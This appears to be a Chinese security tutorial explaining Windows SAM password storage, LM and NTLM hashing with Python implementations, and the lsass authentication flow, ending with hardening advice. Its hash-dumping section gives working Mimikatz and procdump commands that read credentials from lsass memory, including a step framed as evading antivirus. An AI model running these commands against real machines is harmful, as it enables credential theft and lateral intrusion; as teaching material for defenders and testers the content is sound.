Windows本地认证与Hash抓取技术详解<\/h1>

一、Windows密码存储机制<\/h2>
Windows系统的本地登陆密码存储在%SystemRoot%\system32\config\<\/code>目录下的SAM文件中，存储的内容是密码的哈希值而非明文。当用户输入密码时，系统会先将用户输入通过特定算法加密，再与SAM文件中存储的哈希值进行比对，一致则认证成功。<\/p>
Windows系统使用两种密码哈希算法：<\/p>

LM Hash（LAN Manager Hash） - 较老的算法，基本已淘汰<\/li>
NTLM Hash（NT LAN Manager Hash） - 当前主流使用的算法<\/li>
<\/ol>
二、LM Hash算法详解<\/h2>
算法特点<\/h3>

主要用于Windows XP\/2000\/2003等老系统<\/li>
密码不区分大小写（全部转为大写）<\/li>
最大只支持14个字符的密码<\/li>
安全性较低，容易受到彩虹表攻击<\/li>
<\/ul>
算法步骤<\/h3>

将密码转换为大写，并转换为16进制字符串<\/li>
密码不足28位（14字符），用0在右边补全<\/li>
28位的密码分成两个14位部分<\/li>
每部分分别转换成56位比特流，不足用0在左边补齐<\/li>
两组分别再分为7位一组，每组末尾加0，组合成新字符<\/li>
将新字符转为16进制<\/li>
两组16进制数分别作为DES密钥，加密固定字符串"KGS!@#$%"<\/li>
将两组DES加密结果拼接，得到最终的LM Hash<\/li>
<\/ol>
Python实现代码<\/h3>
import<\/span> binascii
<\/span><\/span>import<\/span> codecs
<\/span><\/span>from<\/span> pyDes import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>def<\/span> DesEncrypt<\/span>(str, Key):
<\/span><\/span>    k =<\/span> des(Key, ECB, pad=<\/span>None<\/span>)
<\/span><\/span>    EncryptStr =<\/span> k.<\/span>encrypt(str)
<\/span><\/span>    return<\/span> binascii.<\/span>b2a_hex(EncryptStr)
<\/span><\/span>
<\/span><\/span>def<\/span> ZeroPadding<\/span>(str):
<\/span><\/span>    b =<\/span> []
<\/span><\/span>    l =<\/span> len(str)
<\/span><\/span>    num =<\/span> 0<\/span>
<\/span><\/span>    for<\/span> n in<\/span> range(l):
<\/span><\/span>        if<\/span> (num <<\/span> 8<\/span>) and<\/span> n %<\/span> 7<\/span> ==<\/span> 0<\/span>:
<\/span><\/span>            b.<\/span>append(str[n:n+<\/span>7<\/span>] +<\/span> '0'<\/span>)
<\/span><\/span>            num =<\/span> num +<\/span> 1<\/span>
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(b)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    passwd =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    print('你的输入是:'<\/span>, passwd)
<\/span><\/span>    print('转化为大写:'<\/span>, passwd.<\/span>upper())
<\/span><\/span>    
<\/span><\/span>    # 转换为大写并转为16进制<\/span>
<\/span><\/span>    passwd =<\/span> codecs.<\/span>encode(passwd.<\/span>upper().<\/span>encode(), 'hex_codec'<\/span>)
<\/span><\/span>    print('转为hex:'<\/span>, passwd.<\/span>decode())
<\/span><\/span>    
<\/span><\/span>    # 补全28位<\/span>
<\/span><\/span>    passwd_len =<\/span> len(passwd)
<\/span><\/span>    if<\/span> passwd_len <<\/span> 28<\/span>:
<\/span><\/span>        passwd =<\/span> passwd.<\/span>decode().<\/span>ljust(28<\/span>, '0'<\/span>)
<\/span><\/span>    print('补齐28位:'<\/span>, passwd)
<\/span><\/span>    
<\/span><\/span>    # 分成两部分<\/span>
<\/span><\/span>    PartOne =<\/span> passwd[0<\/span>:14<\/span>]
<\/span><\/span>    PartTwo =<\/span> passwd[14<\/span>:]
<\/span><\/span>    print('两组14位的部分:'<\/span>, PartOne, PartTwo)
<\/span><\/span>    
<\/span><\/span>    # 转为56位比特流<\/span>
<\/span><\/span>    PartOne =<\/span> bin(int(PartOne, 16<\/span>)).<\/span>lstrip('0b'<\/span>).<\/span>rjust(56<\/span>, '0'<\/span>)
<\/span><\/span>    PartTwo =<\/span> bin(int(PartTwo, 16<\/span>)).<\/span>lstrip('0b'<\/span>).<\/span>rjust(56<\/span>, '0'<\/span>)
<\/span><\/span>    print('两组56位比特流:'<\/span>, PartOne, PartTwo)
<\/span><\/span>    
<\/span><\/span>    # 7位一组末尾加0<\/span>
<\/span><\/span>    PartOne =<\/span> ZeroPadding(PartOne)
<\/span><\/span>    PartTwo =<\/span> ZeroPadding(PartTwo)
<\/span><\/span>    print('两组再7位一组末尾加0:'<\/span>, PartOne, PartTwo)
<\/span><\/span>    
<\/span><\/span>    # 转为hex<\/span>
<\/span><\/span>    PartOne =<\/span> hex(int(PartOne, 2<\/span>))[2<\/span>:]
<\/span><\/span>    PartTwo =<\/span> hex(int(PartTwo, 2<\/span>))[2<\/span>:]
<\/span><\/span>    if<\/span> '0'<\/span> ==<\/span> PartTwo:
<\/span><\/span>        PartTwo =<\/span> "0000000000000000"<\/span>
<\/span><\/span>    print('两组转为hex:'<\/span>, PartOne, PartTwo)
<\/span><\/span>    
<\/span><\/span>    # DES加密<\/span>
<\/span><\/span>    LMOne =<\/span> DesEncrypt("KGS!@#$%"<\/span>, binascii.<\/span>a2b_hex(PartOne)).<\/span>decode()
<\/span><\/span>    LMTwo =<\/span> DesEncrypt("KGS!@#$%"<\/span>, binascii.<\/span>a2b_hex(PartTwo)).<\/span>decode()
<\/span><\/span>    print('两组DES加密结果:'<\/span>, LMOne, LMTwo)
<\/span><\/span>    
<\/span><\/span>    # 拼接得到LM Hash<\/span>
<\/span><\/span>    LM =<\/span> LMOne +<\/span> LMTwo
<\/span><\/span>    print('LM hash:'<\/span>, LM)
<\/span><\/span><\/code><\/pre>LM Hash缺陷<\/h3>

密码不区分大小写（全部转为大写处理）<\/li>
密码长度最大只能为14个字符<\/li>
当密码不超过7位时，生成的LM Hash后半部分固定为aad3b435b51404ee<\/code><\/li>
哈希没有加盐，容易受到彩虹表攻击<\/li>
<\/ol>
三、NTLM Hash算法详解<\/h2>
算法特点<\/h3>

当前Windows系统主流使用的算法<\/li>
安全性高于LM Hash<\/li>
支持更长的密码长度<\/li>
区分大小写<\/li>
<\/ul>
算法步骤<\/h3>

将用户输入转为16进制<\/li>
进行Unicode编码<\/li>
调用MD4算法进行加密<\/li>
<\/ol>
Python实现代码<\/h3>
# coding=utf-8<\/span>
<\/span><\/span>import<\/span> codecs
<\/span><\/span>import<\/span> sys
<\/span><\/span>from<\/span> Crypto.Hash import<\/span> MD4
<\/span><\/span>
<\/span><\/span>def<\/span> UnicodeEncode<\/span>(str):
<\/span><\/span>    b =<\/span> []
<\/span><\/span>    l =<\/span> int(len(str)\/<\/span>2<\/span>)
<\/span><\/span>    for<\/span> i in<\/span> range(l):
<\/span><\/span>        b.<\/span>append((str[i*<\/span>2<\/span>:2<\/span>*<\/span>i+<\/span>2<\/span>])+<\/span>'00'<\/span>)
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(b)
<\/span><\/span>
<\/span><\/span>def<\/span> Md4Encode<\/span>(str):
<\/span><\/span>    h =<\/span> MD4.<\/span>new()
<\/span><\/span>    h.<\/span>update(str.<\/span>decode('hex'<\/span>))
<\/span><\/span>    return<\/span> h.<\/span>hexdigest()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    passwd =<\/span> sys.<\/span>argv[1<\/span>]
<\/span><\/span>    print('Input: '<\/span> +<\/span> passwd)
<\/span><\/span>    
<\/span><\/span>    # 转hex<\/span>
<\/span><\/span>    passwd =<\/span> codecs.<\/span>encode(passwd.<\/span>encode(), 'hex_codec'<\/span>).<\/span>decode()
<\/span><\/span>    print('Hex: '<\/span> +<\/span> passwd)
<\/span><\/span>    
<\/span><\/span>    # 转Unicode<\/span>
<\/span><\/span>    passwd =<\/span> UnicodeEncode(passwd)
<\/span><\/span>    print('Unicode: '<\/span> +<\/span> passwd)
<\/span><\/span>    
<\/span><\/span>    # 转md4<\/span>
<\/span><\/span>    NTLMhash =<\/span> Md4Encode(passwd)
<\/span><\/span>    print('NTLMhash: '<\/span> +<\/span> NTLMhash)
<\/span><\/span><\/code><\/pre>更简洁的实现方式：<\/p>
import<\/span> hashlib,<\/span> binascii,<\/span> sys
<\/span><\/span>print binascii.<\/span>hexlify(hashlib.<\/span>new("md4"<\/span>, sys.<\/span>argv[1<\/span>].<\/span>encode("utf-16le"<\/span>)).<\/span>digest())
<\/span><\/span><\/code><\/pre>示例：字符串"admin"的NTLM Hash为209c6174da490caeb422f3fa5a7ae634<\/code><\/p>
四、Windows本地认证流程<\/h2>

用户通过winlogon.exe输入密码<\/li>
lsass.exe进程接收密码明文，存储在内存中<\/li>
lsass.exe将密码加密为NTLM Hash<\/li>
与SAM文件中存储的哈希值进行比对<\/li>
相同则认证成功，不同则认证失败<\/li>
<\/ol>
流程图：<\/p>
[winlogon.exe] → (User input) → [lsass.exe] → {转为NTLM hash与SAM文件对比}
    ↓
    |相等| → (认证成功)
    |不相等| → (认证失败)
<\/code><\/pre>
五、Hash抓取技术<\/h2>
1. 直接使用Mimikatz读取<\/h3>
Mimikatz可以直接从lsass.exe进程内存中读取密码哈希和明文密码：<\/p>
mimikatz.exe
privilege::debug
sekurlsa::logonPasswords full
exit
<\/code><\/pre>
2. Procdump+Mimikatz组合技术<\/h3>
由于直接使用Mimikatz可能被安全软件拦截，可以采用以下方法：<\/p>

使用Procdump工具导出lsass.exe内存转储：<\/li>
<\/ol>
procdump64.exe -accepteula -ma lsass.exe lsass.dump
<\/code><\/pre>

将转储文件拉到没有杀毒软件的机器上，使用Mimikatz分析：<\/li>
<\/ol>
mimikatz.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
exit
<\/code><\/pre>
六、安全建议<\/h2>

禁用LM Hash（在组策略中设置"网络安全：不要在下次更改密码时存储LAN Manager哈希值"）<\/li>
使用长且复杂的密码<\/li>
定期更换密码<\/li>
启用Credential Guard等安全功能<\/li>
监控lsass.exe进程的异常访问行为<\/li>
<\/ol>
七、总结<\/h2>
本文详细介绍了Windows系统的两种密码哈希算法（LM Hash和NTLM Hash）及其实现原理，分析了Windows本地认证流程，并讲解了使用Mimikatz工具抓取密码哈希的技术方法。理解这些原理对于系统安全加固和渗透测试都具有重要意义。<\/p>